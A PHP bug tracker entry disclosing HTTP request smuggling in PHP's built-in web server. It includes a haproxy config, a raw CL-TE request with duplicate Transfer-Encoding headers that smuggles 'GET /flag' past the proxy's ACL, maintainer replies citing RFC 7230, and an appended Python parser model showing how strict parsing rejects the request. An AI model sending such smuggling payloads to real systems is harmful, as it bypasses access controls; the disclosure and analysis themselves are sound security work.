Bug #80043 HTTP Request Smuggling in php webserver
Submitted: 2020-09-01 07:09 UTC Modified: 2021-11-15 15:42 UTC
Votes:1
Avg. Score:5.0 ± 0.0
Reproduced:1 of 1 (100.0%)
Same Version:1 (100.0%)
Same OS:1 (100.0%)
From: kn0wns1c at gmail dot com Assigned:
Status: Open Package: Built-in web server
PHP Version: master-Git-2020-09-01 (Git) OS:
Private report: No CVE-ID: None
 [2020-09-01 07:09 UTC] kn0wns1c at gmail dot com
Description:
------------
The function php_http_parser_execute in sapi\cli\php_http_parser.c parses HTTP requests. When I send two Transfer-Encoding headers, one true and one false, in one HTTP request, it will think that it is a legal request. An attacker may use this feature to make an HTTP Request Smuggling attack.

For example, using haproxy to make a CL-TE attack:

haproxy version 1.5.3, haproxy.cfg
haproxy.cfg forbids access to the /flag URI:

```
global
 daemon
 maxconn 256

defaults
 mode http
 timeout connect 5000ms
 timeout client 50000ms
 timeout server 50000ms

frontend http-in
 bind *:80
 default_backend servers
 acl url_403 path_beg -i /flag
 http-request deny if url_403

backend servers
 server server1 127.0.0.1:8080 maxconn 32

```
Run the PHP webserver:

```
php -S 127.0.0.1:8080
```

Using this HTTP request can bypass the haproxy /flag restriction:

```
POST / HTTP/1.1
Host: 127.0.0.1
Transfer-Encoding: chunked
Transfer-Encoding: chunked-false
Content-Length: 50

1
A
0

GET /flag HTTP/1.1
Host: 127.0.0.1


```


History

 [2020-09-01 07:12 UTC] stas@php.net
-Type: Security +Type: Bug
 [2020-09-01 07:12 UTC] stas@php.net
PHP CLI server is a debug feature and as such bugs in it are not security issues. See https://www.php.net/manual/en/features.commandline.webserver.php
 [2021-11-15 15:42 UTC] cmb@php.net
> Transfer-Encoding: chunked-false

According to RFC 7230, section 3.3.1[1], the built-in Webserver
should respond with 501 (Not Implemented), since it doesn't
support this transfer coding.  However, such faked values are a
very minor problem here.  The bigger problem is that the built-in
Webserver does not even understand generally known values, such as

  Transfer-Encoding: gzip, chunked

but does not reply with 501 either.  The only understood
Transfer-Encoding value is `chunked`.  We may consider changing
this to a doc problem.

[1] <https://datatracker.ietf.org/doc/html/rfc7230#section-3.3.1>
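As an added example that is not part of this bug report, of the PHP sources, or of the comments above: a small Python request framer with three modes, run over the reporter's request. `content-length` frames by Content-Length the way the haproxy front end in the report does; `lenient-chunked` treats any Transfer-Encoding list that contains `chunked` as chunked and ignores every other token, which is the behaviour the report and the comment above describe for the built-in web server (it is a model of that description, not the real php_http_parser.c logic); `strict` follows RFC 7230 section 3.3.1 and 3.3.3, answering 501 for a transfer coding it does not implement and 400 when Transfer-Encoding and Content-Length are both present. The request bytes are copied from the report; the `gzip, chunked` request is constructed here to illustrate the comment above. The function and mode names are this example's own.

```python
# Added example, not from the bug report or PHP: a minimal HTTP/1.1 request
# framer with three behaviours, run over the request from the report. The
# "lenient-chunked" mode models the built-in server as described on this page
# (only "chunked" is understood, other tokens are ignored); it is a model, not
# the real php_http_parser.c logic.

class FramingError(Exception):
    """A strict parser would reject the stream; .status is the response code."""
    def __init__(self, status, msg):
        super().__init__(msg)
        self.status = status

def parse_head(data):
    """Return (request line, [(lower-cased name, value)], bytes after the head)."""
    head, sep, rest = data.partition(b"\r\n\r\n")
    if not sep:
        raise FramingError(400, "incomplete request head")
    lines = head.decode("latin-1").split("\r\n")
    headers = [(n.strip().lower(), v.strip())
               for n, _, v in (line.partition(":") for line in lines[1:])]
    return lines[0], headers, rest

def dechunk(rest):
    """Consume one chunked body; return (body, bytes left over after it)."""
    body, pos = b"", 0
    while True:
        end = rest.find(b"\r\n", pos)
        if end < 0:
            raise FramingError(400, "truncated chunk")
        size = int(rest[pos:end].split(b";")[0], 16)  # ignore chunk extensions
        pos = end + 2
        if size == 0:
            # zero-size chunk; the next empty line ends the body (no trailers here)
            if rest[pos:pos + 2] != b"\r\n":
                raise FramingError(400, "missing chunked terminator")
            return body, rest[pos + 2:]
        body += rest[pos:pos + size]
        pos += size + 2  # chunk data plus its CRLF

def frame_requests(data, mode):
    """Split a byte stream into [(request line, body), ...] according to mode."""
    requests = []
    while data.strip():
        request_line, headers, rest = parse_head(data)
        te_tokens = [t.strip().lower() for n, v in headers
                     if n == "transfer-encoding" for t in v.split(",")]
        cl_values = [v for n, v in headers if n == "content-length"]
        length = int(cl_values[0]) if cl_values else 0
        if mode == "content-length":
            # front end that frames by Content-Length, like the report's haproxy
            body, data = rest[:length], rest[length:]
        elif mode == "lenient-chunked":
            # any "chunked" token wins; "chunked-false", "gzip", ... are ignored
            if "chunked" in te_tokens:
                body, data = dechunk(rest)
            else:
                body, data = rest[:length], rest[length:]
        elif mode == "strict":
            unknown = [t for t in te_tokens if t != "chunked"]
            if unknown:  # RFC 7230 3.3.1: 501 for a coding we do not implement
                raise FramingError(501, "unsupported transfer coding: " + ", ".join(unknown))
            if te_tokens and cl_values:  # RFC 7230 3.3.3: may be rejected with 400
                raise FramingError(400, "Transfer-Encoding with Content-Length")
            if te_tokens:
                body, data = dechunk(rest)
            elif len(rest) < length:
                raise FramingError(400, "truncated body")
            else:
                body, data = rest[:length], rest[length:]
        else:
            raise ValueError("unknown mode " + mode)
        requests.append((request_line, body))
    return requests

def reject_status(data, mode):
    """Status a parser in mode would answer with, or None if it accepts the stream."""
    try:
        frame_requests(data, mode)
    except FramingError as err:
        return err.status
    return None

# Request bytes copied from the report; Content-Length: 50 covers exactly the
# chunked body plus the smuggled GET.
SMUGGLED = (b"POST / HTTP/1.1\r\nHost: 127.0.0.1\r\n"
            b"Transfer-Encoding: chunked\r\nTransfer-Encoding: chunked-false\r\n"
            b"Content-Length: 50\r\n\r\n"
            b"1\r\nA\r\n0\r\n\r\n"
            b"GET /flag HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n")

# Constructed here (not from the page) for the "gzip, chunked" point above.
GZIP_CHUNKED = (b"POST / HTTP/1.1\r\nHost: 127.0.0.1\r\n"
                b"Transfer-Encoding: gzip, chunked\r\n\r\n1\r\nA\r\n0\r\n\r\n")

if __name__ == "__main__":
    for mode in ("content-length", "lenient-chunked", "strict"):
        try:
            print(mode, [line for line, _ in frame_requests(SMUGGLED, mode)])
        except FramingError as err:
            print(mode, "rejects with", err.status)
```

Run as a script it prints one request line for `content-length`, two (the POST and the smuggled `GET /flag`) for `lenient-chunked`, and a 501 rejection for `strict`: the 50-byte Content-Length body the front end forwards as a whole is re-split by a chunked-only back end at the `0` chunk, so the rest of the body becomes a new request the front end's ACL never saw. The `strict` mode is what the comment above asks for and is also what removes the ambiguity: a parser that refuses an unknown coding cannot be steered by a second, bogus Transfer-Encoding header.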